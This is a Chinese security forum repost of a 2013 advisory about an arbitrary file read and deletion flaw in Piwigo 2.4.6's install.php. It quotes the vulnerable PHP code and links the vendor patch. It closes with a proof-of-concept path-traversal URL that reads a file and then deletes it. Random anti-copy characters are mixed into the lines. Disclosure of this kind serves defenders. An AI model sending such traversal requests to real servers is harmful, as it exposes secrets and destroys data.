找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2363|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。7 ^( x- V2 f( {  W0 S8 @/ G

( }- V' i3 [# f  s5 m: ~Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。. \: b+ O4 D( ~$ g# a
====================================================================* c2 P" C! i; m5 G' G! Z# P
/install.php:
/ ^" a- x) C" W; ^2 Z0 [3 k$ p-------------
% a! H2 Y( f& [- D# i6 ~/ H113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
5 ~4 n' O! {8 ~1 m1 n114: {! L4 `0 a9 m& l
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
* J4 b1 m+ c% @- H0 Y116:   header('Cache-Control: no-cache, must-revalidate');, z: B8 g& K3 h( w, Q2 }
117:   header('Pragma: no-cache');- S7 `  g7 `* {" }- x
118:   header('Content-Disposition: attachment; filename="database.inc.php"');+ k7 s! z3 H8 U4 {
119:   header('Content-Transfer-Encoding: binary');+ w& S' i# ~( L6 h' ]; f2 V
120:   header('Content-Length: '.filesize($filename));2 s/ {# {. f/ I; d$ V& {( B
121:   echo file_get_contents($filename);, }& ?  b9 [$ p. z2 u
122:   unlink($filename);
; Y) p, w  @+ E7 i4 p5 k& A4 p123:   exit();7 ~* A* C5 a+ `$ B
124: }( \+ b% G* U+ x* k
====================================================================
& X7 {7 M& i( }1 _# C  i5 S
: J% _! J% y, I! mTested on: Microsoft Windows 7 Ultimate SP1 (EN)- I/ m  s4 f) `/ }# j5 m" x, B% R. \
           Apache 2.4.2 (Win32), D: f4 ?/ T7 Q; v$ X# a" X: c. z$ r8 f
           PHP 5.4.42 K, S. m5 r' _9 `( N5 s
           MySQL 5.5.25a# D& K) `4 z) w4 G4 |% ^
+ _8 e( ^8 A  L# M
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# D6 Q' q& N' U+ C, R, T
                            @zeroscience/ X' ^) i. Z5 Y: C
4 K( E7 g! j0 j% |
Advisory ID: ZSL-2013-51276 p. ^* H# T- B$ |2 ]) ]; x6 g6 B) f
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
$ W* x: t; n9 N' I  |: ]. tVendor Patch: http://piwigo.org/bugs/view.php?id=2843
0 t+ P5 k( x2 }/ n
' y- c; ]9 D/ ^5 k) @15.02.2013
/ U# y' W& ?& [1 u! K$ a9 G: d
1 O! _/ @1 [# e--! |" o* k. H- A) G) U  m
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt4 f+ f+ f, ]# L7 ]8 b

8 a/ d6 t3 r  x0 P3 q6 G1 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表